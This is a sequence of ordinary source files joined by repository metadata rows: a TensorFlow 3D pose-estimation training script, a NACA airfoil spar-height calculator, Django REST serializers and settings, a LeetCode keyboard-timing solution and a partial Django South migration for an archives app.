tf.app.flags.DEFINE_string("openpose", "openpose_output", "openpose output Data directory")
tf.app.flags.DEFINE_integer("gif_fps", 30, "output gif framerate")
tf.app.flags.DEFINE_integer("verbose", 2, "0:Error, 1:Warning, 2:INFO*(default), 3:debug")
# Train or load
tf.app.flags.DEFINE_boolean("sample", False, "Set to True for sampling.")
tf.app.flags.DEFINE_boolean("use_cpu", False, "Whether to use the CPU")
tf.app.flags.DEFINE_integer("load", 0, "Try to load a previous checkpoint.")
# Misc
tf.app.flags.DEFINE_boolean("use_fp16", False, "Train using fp16 instead of fp32.")
FLAGS = tf.app.flags.FLAGS
train_dir = os.path.join( FLAGS.train_dir,
FLAGS.action,
'dropout_{0}'.format(FLAGS.dropout),
'epochs_{0}'.format(FLAGS.epochs) if FLAGS.epochs > 0 else '',
'lr_{0}'.format(FLAGS.learning_rate),
'residual' if FLAGS.residual else 'not_residual',
'depth_{0}'.format(FLAGS.num_layers),
'linear_size{0}'.format(FLAGS.linear_size),
'batch_size_{0}'.format(FLAGS.batch_size),
'procrustes' if FLAGS.procrustes else 'no_procrustes',
'maxnorm' if FLAGS.max_norm else 'no_maxnorm',
'batch_normalization' if FLAGS.batch_norm else 'no_batch_normalization',
'use_stacked_hourglass' if FLAGS.use_sh else 'not_stacked_hourglass',
'predict_14' if FLAGS.predict_14 else 'predict_17')
print( train_dir )
summaries_dir = os.path.join( train_dir, "log" ) # Directory for TB summaries
# To avoid race conditions: https://github.com/tensorflow/tensorflow/issues/7448
os.system('mkdir -p {}'.format(summaries_dir))
def create_model( session, actions, batch_size ):
"""
Create model and initialize it or load its parameters in a session
Args
session: tensorflow session
actions: list of string. Actions to train/test on
batch_size: integer. Number of examples in each batch
Returns
model: The created (or loaded) model
Raises
ValueError if asked to load a model, but the checkpoint specified by
FLAGS.load cannot be found.
"""
model = linear_model.LinearModel(
FLAGS.linear_size,
FLAGS.num_layers,
FLAGS.residual,
FLAGS.batch_norm,
FLAGS.max_norm,
batch_size,
FLAGS.learning_rate,
summaries_dir,
FLAGS.predict_14,
dtype=tf.float16 if FLAGS.use_fp16 else tf.float32)
if FLAGS.load <= 0:
# Create a new model from scratch
print("Creating model with fresh parameters.")
session.run( tf.global_variables_initializer() )
return model
# Load a previously saved model
ckpt = tf.train.get_checkpoint_state( train_dir, latest_filename="checkpoint")
print( "train_dir", train_dir )
if ckpt and ckpt.model_checkpoint_path:
# Check if the specific checkpoint exists
if FLAGS.load > 0:
if os.path.isfile(os.path.join(train_dir,"checkpoint-{0}.index".format(FLAGS.load))):
ckpt_name = os.path.join( os.path.join(train_dir,"checkpoint-{0}".format(FLAGS.load)) )
else:
raise ValueError("Asked to load checkpoint {0}, but it does not seem to exist".format(FLAGS.load))
else:
ckpt_name = os.path.basename( ckpt.model_checkpoint_path )
print("Loading model {0}".format( ckpt_name ))
model.saver.restore( session, ckpt.model_checkpoint_path )
return model
else:
print("Could not find checkpoint. Aborting.")
raise( ValueError, "Checkpoint {0} does not seem to exist".format( ckpt.model_checkpoint_path ) )
return model
def train():
"""Train a linear model for 3d pose estimation"""
actions = data_utils.define_actions( FLAGS.action )
number_of_actions = len( actions )
# Load camera parameters
SUBJECT_IDS = [1,5,6,7,8,9,11]
rcams = cameras.load_cameras(FLAGS.cameras_path, SUBJECT_IDS)
# Load 3d data and load (or create) 2d projections
train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d, train_root_positions, test_root_positions = data_utils.read_3d_data(
actions, FLAGS.data_dir, FLAGS.camera_frame, rcams, FLAGS.predict_14 )
# Read stacked hourglass 2D predictions if use_sh, otherwise use groundtruth 2D projections
if FLAGS.use_sh:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_2d_predictions(actions, FLAGS.data_dir)
else:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.create_2d_data( actions, FLAGS.data_dir, rcams )
print( "done reading and normalizing data." )
# Avoid using the GPU if requested
device_count = {"GPU": 0} if FLAGS.use_cpu else {"GPU": 1}
with tf.Session(config=tf.ConfigProto(
device_count=device_count,
allow_soft_placement=True )) as sess:
# === Create the model ===
print("Creating %d bi-layers of %d units." % (FLAGS.num_layers, FLAGS.linear_size))
model = create_model( sess, actions, FLAGS.batch_size )
model.train_writer.add_graph( sess.graph )
print("Model created")
#=== This is the training loop ===
step_time, loss, val_loss = 0.0, 0.0, 0.0
current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1
previous_losses = []
step_time, loss = 0, 0
current_epoch = 0
log_every_n_batches = 100
for _ in xrange( FLAGS.epochs ):
current_epoch = current_epoch + 1
# === Load training batches for one epoch ===
encoder_inputs, decoder_outputs = model.get_all_batches( train_set_2d, train_set_3d, FLAGS.camera_frame, training=True )
nbatches = len( encoder_inputs )
print("There are {0} train batches".format( nbatches ))
start_time, loss = time.time(), 0.
# === Loop through all the training batches ===
for i in range( nbatches ):
if (i+1) % log_every_n_batches == 0:
# Print progress every log_every_n_batches batches
print("Working on epoch {0}, batch {1} / {2}... ".format( current_epoch, i+1, nbatches), end="" )
enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]
step_loss, loss_summary, lr_summary, _ = model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )
if (i+1) % log_every_n_batches == 0:
# Log and print progress every log_every_n_batches batches
model.train_writer.add_summary( loss_summary, current_step )
model.train_writer.add_summary( lr_summary, current_step )
step_time = (time.time() - start_time)
start_time = time.time()
print("done in {0:.2f} ms".format( 1000*step_time / log_every_n_batches ) )
loss += step_loss
current_step += 1
# === end looping through training batches ===
loss = loss / nbatches
print("=============================\n"
"Global step: %d\n"
"Learning rate: %.2e\n"
"Train loss avg: %.4f\n"
"=============================" % (model.global_step.eval(),
model.learning_rate.eval(), loss) )
# === End training for an epoch ===
# === Testing after this epoch ===
isTraining = False
if FLAGS.evaluateActionWise:
print("{0:=^12} {1:=^6}".format("Action", "mm")) # line of 30 equal signs
cum_err = 0
for action in actions:
print("{0:<12} ".format(action), end="")
# Get 2d and 3d testing data for this action
action_test_set_2d = get_action_subset( test_set_2d, action )
action_test_set_3d = get_action_subset( test_set_3d, action )
encoder_inputs, decoder_outputs = model.get_all_batches( action_test_set_2d, action_test_set_3d, FLAGS.camera_frame, training=False)
act_err, _, step_time, loss = evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs )
cum_err = cum_err + act_err
print("{0:>6.2f}".format(act_err))
summaries = sess.run( model.err_mm_summary, {model.err_mm: float(cum_err/float(len(actions)))} )
model.test_writer.add_summary( summaries, current_step )
print("{0:<12} {1:>6.2f}".format("Average", cum_err/float(len(actions) )))
print("{0:=^19}".format(''))
else:
n_joints = 17 if not(FLAGS.predict_14) else 14
encoder_inputs, decoder_outputs = model.get_all_batches( test_set_2d, test_set_3d, FLAGS.camera_frame, training=False)
total_err, joint_err, step_time, loss = evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs, current_epoch )
print("=============================\n"
"Step-time (ms): %.4f\n"
"Val loss avg: %.4f\n"
"Val error avg (mm): %.2f\n"
"=============================" % ( 1000*step_time, loss, total_err ))
for i in range(n_joints):
# 6 spaces, right-aligned, 5 decimal places
print("Error in joint {0:02d} (mm): {1:>5.2f}".format(i+1, joint_err[i]))
print("=============================")
# Log the error to tensorboard
summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )
model.test_writer.add_summary( summaries, current_step )
# Save the model
print( "Saving the model... ", end="" )
start_time = time.time()
model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step )
print( "done in {0:.2f} ms".format(1000*(time.time() - start_time)) )
# Reset global time and loss
step_time, loss = 0, 0
sys.stdout.flush()
def get_action_subset( poses_set, action ):
"""
Given a preloaded dictionary of poses, load the subset of a particular action
Args
poses_set: dictionary with keys k=(subject, action, seqname),
values v=(nxd matrix of poses)
action: string. The action that we want to filter out
Returns
poses_subset: dictionary with same structure as poses_set, but only with the
specified action.
"""
return {k:v for k, v in poses_set.items() if k[1] == action}
def evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs, current_epoch=0 ):
"""
Generic method that evaluates performance of a list of batches.
May be used to evaluate all actions or a single action.
Args
sess
model
data_mean_3d
data_std_3d
dim_to_use_3d
dim_to_ignore_3d
data_mean_2d
data_std_2d
dim_to_use_2d
dim_to_ignore_2d
current_step
encoder_inputs
decoder_outputs
current_epoch
Returns
total_err
joint_err
step_time
loss
"""
n_joints = 17 if not(FLAGS.predict_14) else 14
nbatches = len( encoder_inputs )
# Loop through test examples
all_dists, start_time, loss = [], time.time(), 0.
log_every_n_batches = 100
for i in range(nbatches):
if current_epoch > 0 and (i+1) % log_every_n_batches == 0:
print("Working on test epoch {0}, batch {1} / {2}".format( current_epoch, i+1, nbatches) )
enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]
dp = 1.0 # dropout keep probability is always 1 at test time
step_loss, loss_summary, poses3d = model.step( sess, enc_in, dec_out, dp, isTraining=False )
loss += step_loss
# denormalize
enc_in = data_utils.unNormalizeData( enc_in, data_mean_2d, data_std_2d, dim_to_ignore_2d )
dec_out = data_utils.unNormalizeData( dec_out, data_mean_3d, data_std_3d, dim_to_ignore_3d )
poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )
# Keep only the relevant dimensions
dtu3d = np.hstack( (np.arange(3), dim_to_use_3d) ) if not(FLAGS.predict_14) else dim_to_use_3d
dec_out = dec_out[:, dtu3d]
poses3d = poses3d[:, dtu3d]
assert dec_out.shape[0] == FLAGS.batch_size
assert poses3d.shape[0] == FLAGS.batch_size
if FLAGS.procrustes:
# Apply per-frame procrustes alignment if asked to do so
for j in range(FLAGS.batch_size):
gt = np.reshape(dec_out[j,:],[-1,3])
out = np.reshape(poses3d[j,:],[-1,3])
_, Z, T, b, c = procrustes.compute_similarity_transform(gt,out,compute_optimal_scale=True)
out = (b*out.dot(T))+c
poses3d[j,:] = np.reshape(out,[-1,17*3] ) if not(FLAGS.predict_14) else np.reshape(out,[-1,14*3] )
# Compute Euclidean distance error per joint
sqerr = (poses3d - dec_out)**2 # Squared error between prediction and expected output
dists = np.zeros( (sqerr.shape[0], n_joints) ) # Array with L2 error per joint in mm
dist_idx = 0
for k in np.arange(0, n_joints*3, 3):
# Sum across X,Y, and Z dimenstions to obtain L2 distance
dists[:,dist_idx] = np.sqrt( np.sum( sqerr[:, k:k+3], axis=1 ))
dist_idx = dist_idx + 1
all_dists.append(dists)
assert sqerr.shape[0] == FLAGS.batch_size
step_time = (time.time() - start_time) / nbatches
loss = loss / nbatches
all_dists = np.vstack( all_dists )
# Error per joint and total for all passed batches
joint_err = np.mean( all_dists, axis=0 )
total_err = np.mean( all_dists )
return total_err, joint_err, step_time, loss
def sample():
"""Get samples from a model and visualize them"""
actions = data_utils.define_actions( FLAGS.action )
# Load camera parameters
SUBJECT_IDS = [1,5,6,7,8,9,11]
rcams = cameras.load_cameras(FLAGS.cameras_path, SUBJECT_IDS)
# Load 3d data and load (or create) 2d projections
train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d, train_root_positions, test_root_positions = data_utils.read_3d_data(
actions, FLAGS.data_dir, FLAGS.camera_frame, rcams, FLAGS.predict_14 )
if FLAGS.use_sh:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_2d_predictions(actions, FLAGS.data_dir)
else:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.create_2d_data( actions, FLAGS.data_dir, rcams )
print( "done reading and normalizing data." )
device_count = {"GPU": 0} if FLAGS.use_cpu else {"GPU": 1}
with tf.Session(config=tf.ConfigProto( device_count = device_count )) as sess:
# === Create the model ===
print("Creating %d layers of %d units." % (FLAGS.num_layers, FLAGS.linear_size))
batch_size = 128
model = create_model(sess, actions, batch_size)
print("Model loaded")
for key2d in test_set_2d.keys():
(subj, b, fname) = key2d
print( "Subject: {}, action: {}, fname: {}".format(subj, b, fname) )
# keys should be the same if 3d is in camera coordinates
key3d = key2d if FLAGS.camera_frame else (subj, b, '{0}.h5'.format(fname.split('.')[0]))
key3d = (subj, b, fname[:-3]) if (fname.endswith('-sh')) and FLAGS.camera_frame else key3d
enc_in = test_set_2d[ key2d ]
n2d, _ = enc_in.shape
dec_out = test_set_3d[ key3d ]
n3d, _ = dec_out.shape
assert n2d == n3d
# Split into about-same-size batches
enc_in = np.array_split( enc_in, n2d // batch_size )
dec_out = np.array_split( dec_out, n3d // batch_size )
all_poses_3d = []
for bidx in range( len(enc_in) ):
# Dropout probability 0 (keep probability 1) for sampling
dp = 1.0
_, _, poses3d = model.step(sess, enc_in[bidx], dec_out[bidx], dp, isTraining=False)
# denormalize
enc_in[bidx] = data_utils.unNormalizeData( enc_in[bidx], data_mean_2d, data_std_2d, dim_to_ignore_2d )
dec_out[bidx] = data_utils.unNormalizeData( dec_out[bidx], data_mean_3d, data_std_3d, dim_to_ignore_3d )
poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )
all_poses_3d.append( poses3d )
# Put all the poses together
enc_in, dec_out, poses3d = map( np.vstack, [enc_in, dec_out, all_poses_3d] )
# Convert back to world coordinates
if FLAGS.camera_frame:
N_CAMERAS = 4
N_JOINTS_H36M = 32
# Add global position back
dec_out = dec_out + np.tile( test_root_positions[ key3d ], [1,N_JOINTS_H36M] )
# Load the appropriate camera
subj, _, sname = key3d
cname = sname.split('.')[1] # <-- camera name
scams = {(subj,c+1): rcams[(subj,c+1)] for c in range(N_CAMERAS)} # cams of this subject
scam_idx = [scams[(subj,c+1)][-1] for c in range(N_CAMERAS)].index( cname ) # index of camera used
the_cam = scams[(subj, scam_idx+1)] # <-- the camera used
R, T, f, c, k, p, name = the_cam
assert name == cname
def cam2world_centered(data_3d_camframe):
data_3d_worldframe = cameras.camera_to_world_frame(data_3d_camframe.reshape((-1, 3)), R, T)
data_3d_worldframe = data_3d_worldframe.reshape((-1, N_JOINTS_H36M*3))
# subtract root translation
return data_3d_worldframe - np.tile( data_3d_worldframe[:,:3], (1,N_JOINTS_H36M) )
# Apply inverse rotation and translation
dec_out = cam2world_centered(dec_out)
poses3d = cam2world_centered(poses3d)
# Grab a random batch to visualize
enc_in, dec_out, poses3d = map( np.vstack, [enc_in, dec_out, poses3d] )
idx = np.random.permutation( enc_in.shape[0] )
enc_in, dec_out, poses3d = enc_in[idx, :], dec_out[idx, :], poses3d[idx, :]
# Visualize random samples
import matplotlib.gridspec as gridspec
# 1080p = 1,920 x 1,080
fig = plt.figure( figsize=(19.2, 10.8) )
gs1 = gridspec.GridSpec(5, 9) # 5 rows, 9 columns
gs1.update(wspace=-0.00, hspace=0.05) # set the spacing between axes.
plt.axis('off')
subplot_idx, exidx = 1, 1
nsamples = 15
for i in np.arange( nsamples ):
# Plot 2d pose
ax1 = plt.subplot(gs1[subplot_idx-1])
p2d = enc_in[exidx,:]
viz.show2Dpose( p2d, ax1 )
ax1.invert_yaxis()
# Plot 3d gt
ax2 = plt.subplot(gs1[subplot_idx], projection='3d')
p3d = dec_out[exidx,:]
viz.show3Dpose( p3d, ax2 )
# Plot 3d predictions
ax3 = plt.subplot(gs1[subplot_idx+1], projection='3d')
p3d = poses3d[exidx,:]
viz.show3Dpose( p3d, ax3, lcolor="#9b59b6", rcolor="#2ecc71" )
exidx = exidx + 1
subplot_idx = subplot_idx + 3
plt.show()
def main(_):
if FLAGS.sample:
sample()
else:
train()
if __name__ == "__main__":
tf.app.run()
| [
"[email protected]"
] | |
95d818af2f4d1b2556855c88d57e7be0018bcf71 | 4248fdd3d9791f74f4d2be799f4fe5547e5d59ce | /HeightofSparNonSymm.py | 41a5c0c67ba7ae9d4759d459bd7f60e8545893f6 | [] | no_license | rcbeneduce/TritonUAS | d8afe407c48c8853929af22af80f8d957c559eb6 | e3dcc0d9cd01c5587dd3add4493b68950644c2a1 | refs/heads/main | 2023-03-02T00:57:11.820777 | 2021-02-07T19:35:30 | 2021-02-07T19:35:30 | 331,475,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 20 08:15:12 2021
@author: Ryan
"""
#For Triton UAS
#determination of max height of Spar at desired locations
#source equations found at:
#airfoiltools.com/airfoil/naca4digit
#nonsymmetrical airfoils only
#see other file for symmetrical airfoils
#symmetrical airfoils will contain a 00 at the beginning
import math
NACA=list(str(2424)) #Full NACA Airfoil #will get buggy if airfoil has 00s
M=int(NACA[0])/100 #max camber
P=int(NACA[1])/10 #position of max camber
T=int(NACA[2]+NACA[3])/100 #thickness
#Yt calulcation
c=1 #chord length
ao=.2969
a1=-.126
a2=-.3516
a3=.2843
a4=-.1015 #or -.1036 (close tail edge) #-.1015 (normal tail edge)
x=.2 #at what length of the span? (0-1 range of values)
yt=T*5*c*(ao*(x/c)**.5+a1*x/c+a2*(x/c)**2+a3*(x/c)**3+a4*(x/c)**4)
#Yc calculation
#Gradient Calculation
#iteration between values of desired x and position of max camber
if (x<P*c):
yc=((M*x)/P**2)*(2*P-(x/c)) #camber
dycdx=(2*M/P**2)*(P-(x/c)) #gradient
elif (x>=P*c):
yc=(M*(c-x))/(1-P)**2*(1+(x/c)-2*P) #camber
dycdx=(2*M/(1-P)**2)*(P-(x/c)) #gradient
#theta and upper/lower surface calcs
theta=math.atan(dycdx)
xu=x-yt*math.sin(theta) #upper bound x
xl=x+yt*math.sin(theta) #lower bound x
yu=yc+yt*math.cos(theta) #upper bound y
yl=yc-yt*math.cos(theta) #lower bound y
print("At position x=",x,"The max spar height is=",(yu-yl))
| [
"[email protected]"
] | |
7e326e95b2f215277fad954226ecacab2de1fc80 | ff861e42ddc870274000de686665c8c8430a05b9 | /news/news_api/serializers.py | 9103a96e3c54ccfc85ffe44cdcfccb5943f225bf | [] | no_license | vkhalaim/develops_test | c312b8e9261a4dab0cd6417e0bbee5b2d280b5b8 | 2492c2b8181dc1cc4e27876e9aa8ed76c19ee641 | refs/heads/master | 2022-12-07T08:27:52.272297 | 2020-09-03T10:02:06 | 2020-09-03T10:02:06 | 292,081,779 | 0 | 0 | null | 2020-09-02T17:06:07 | 2020-09-01T18:52:44 | Python | UTF-8 | Python | false | false | 728 | py | from rest_framework import serializers
from .models import Post, Comment
class PostSerializer(serializers.ModelSerializer):
comments = serializers.HyperlinkedRelatedField(
many=True, read_only=True, view_name="comments-detail"
)
class Meta:
model = Post
fields = [
"title",
"link",
"creation_date",
"upvotes",
"author",
"comments",
]
read_only_fields = [
"votes",
]
class CommentSerializer(serializers.ModelSerializer):
class Meta:
model = Comment
fields = [
"author",
"content",
"created",
"post",
]
| [
"[email protected]"
] | |
8d709de8cf0a40a56f67797e504889b8262839ae | f3ac8922bf8b8358c117825975c25b43ac342c07 | /TestDatas/Common_Datas.py | 1ea84d5e89f3d23e37504fdae10547127ec2ea92 | [] | no_license | tangtangmao/KetangpaiWebtest | be176c8048e9036cc99a5a974f93dc85bd764f32 | 34683dbe5cd8254d217023214836654114e5e1b2 | refs/heads/master | 2022-04-26T22:09:27.096734 | 2020-04-29T07:20:08 | 2020-04-29T07:20:08 | 256,442,839 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#@Time : 2020/4/4 11:16
#@Author: hxj
#@File : Common_Datas.py
#用来存放一些公共的全局配置
#全局的系统访问地址,登陆连接
web_login_url="https://www.ketangpai.com/" | [
"[email protected]"
] | |
bb474a8dff0c79f39dff9351ec66adbebf334cc2 | e5eb6503958f794aaba90636b3415564e984e2d8 | /datamodel/migrations/0015_auto_20191212_1501.py | dddb54ff4581f68fae0ad7bed903b0109ba060b9 | [] | no_license | AdrianCV412/PSI_Extraordinaria | 4005217c61e9d88538be21911fa6367e365190ec | 5e3da07c7d71c1c817445ae73d02c5c07284d7ab | refs/heads/master | 2023-07-22T07:37:53.022367 | 2020-06-11T11:05:14 | 2020-06-11T11:05:14 | 269,599,552 | 0 | 0 | null | 2021-06-10T22:59:50 | 2020-06-05T10:22:24 | Python | UTF-8 | Python | false | false | 391 | py | # Generated by Django 2.2.7 on 2019-12-12 15:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datamodel', '0014_auto_20191210_1713'),
]
operations = [
migrations.AlterField(
model_name='move',
name='date',
field=models.DateField(default='2019-12-12'),
),
]
| [
"[email protected]"
] | |
f1a26d8535ee4e801718164bb5381dda69821129 | a9fe1b5c320cdef138ac4a942a8b741c7f27de7c | /LC1165-Single-Row-Keyboard.py | b61ee59f2cb456449c1170110439d12eae92960f | [] | no_license | kate-melnykova/LeetCode-solutions | a6bbb5845310ce082770bcb92ef6f6877962a8ee | ee8237b66975fb5584a3d68b311e762c0462c8aa | refs/heads/master | 2023-06-28T06:35:33.342025 | 2021-07-30T06:59:31 | 2021-07-30T06:59:31 | 325,106,033 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | """
There is a special keyboard with all keys in a single row.
Given a string keyboard of length 26 indicating the layout of
the keyboard (indexed from 0 to 25), initially your finger is
at index 0. To type a character, you have to move your finger
to the index of the desired character. The time taken to move
your finger from index i to index j is |i - j|.
You want to type a string word. Write a function to calculate
how much time it takes to type it with one finger.
Example 1:
Input: keyboard = "abcdefghijklmnopqrstuvwxyz", word = "cba"
Output: 4
Explanation: The index moves from 0 to 2 to write 'c' then to 1
to write 'b' then to 0 again to write 'a'.
Total time = 2 + 1 + 1 = 4.
Example 2:
Input: keyboard = "pqrstuvwxyzabcdefghijklmno", word = "leetcode"
Output: 73
Constraints:
(*) keyboard.length == 26
(*) keyboard contains each English lowercase letter exactly once in some order.
(*) 1 <= word.length <= 10^4
(*) word[i] is an English lowercase letter.
"""
class Solution:
def calculateTime(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n)
Space complexity: O(n)
"""
locations = {key: i for i, key in enumerate(keyboard)}
loc = 0
dist = 0
for char in word:
dist += abs(loc - locations[char])
loc = locations[char]
return dist
def calculateTimeNoSpace(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n^2)
Space complexity: O(1)
"""
self.keyboard = keyboard
loc = 0
dist = 0
for char in word:
new_loc = self._get_loc(char)
dist += abs(loc - new_loc)
loc = new_loc
return dist
def _get_loc(self, char: str):
return self.keyboard.index(char)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
["abcdefghijklmnopqrstuvwxyz", "cba", 4],
["pqrstuvwxyzabcdefghijklmno", "leetcode", 73]
]
methods = ['calculateTime', 'calculateTimeNoSpace']
for method in methods:
print(f'Running tests for {method}')
run_tests(getattr(Solution(), method), correct_answers) | [
"[email protected]"
] | |
02dd977436f11939f930ff3f807955ba0b959b3d | c97be8b4d3b7622cfbaec735fcb945c140f6e358 | /mysite/settings.py | f1b9c25ac2a217fe889d1e3200fccc156d840eb8 | [] | no_license | Mulannn/my-first-blog | 9603adf2497c977531941afd9cdeb1d3cf109c8f | f7f3ca7f327c02832fb15e7045dfa3c2f3e9b3d6 | refs/heads/master | 2020-03-27T19:25:15.686643 | 2018-09-01T14:39:49 | 2018-09-01T14:39:49 | 146,987,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,193 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2os&)6gtt9s*=-r3-(3hmg09xe!y17jegt*gceipezu=zua&$_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Budapest'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
199702ad609cce49f16724e9aaa7caa86a4959f6 | e2b6ff88f4b57c815fa60516ec11c611617fad7f | /archives/migrations/0035_auto__add_field_mediacollectivity_role__add_field_archivecollectivity_.py | 32ec20fb54866fb8789338f5ec7fc72c70810fb1 | [] | no_license | funkyminh/archiprod | 7ed5507f5097e1d3db14fef7c45ebda2e6238579 | 89772ca8ef70960157fefefff5f3a893f91f3635 | refs/heads/master | 2016-08-05T04:58:05.836863 | 2015-04-22T15:03:48 | 2015-04-22T15:03:48 | 34,397,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,855 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'MediaCollectivity.role'
db.add_column('archives_media_collectivities', 'role',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['utils.Role'], null=True, blank=True),
keep_default=False)
# Adding field 'ArchiveCollectivity.role'
db.add_column('archives_archive_collectivities', 'role',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['utils.Role'], null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'MediaCollectivity.role'
db.delete_column('archives_media_collectivities', 'role_id')
# Deleting field 'ArchiveCollectivity.role'
db.delete_column('archives_archive_collectivities', 'role_id')
models = {
u'archives.archive': {
'Meta': {'object_name': 'Archive'},
'available': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'through': u"orm['archives.ArchiveCollectivity']", 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_transfert': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['events.Event']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_archiprod': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'note2prog_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'old_id': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '12', 'null': 'True', 'blank': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['archives.ArchiveParticipant']", 'blank': 'True'}),
'pending': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'place': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Place']", 'null': 'True', 'blank': 'True'}),
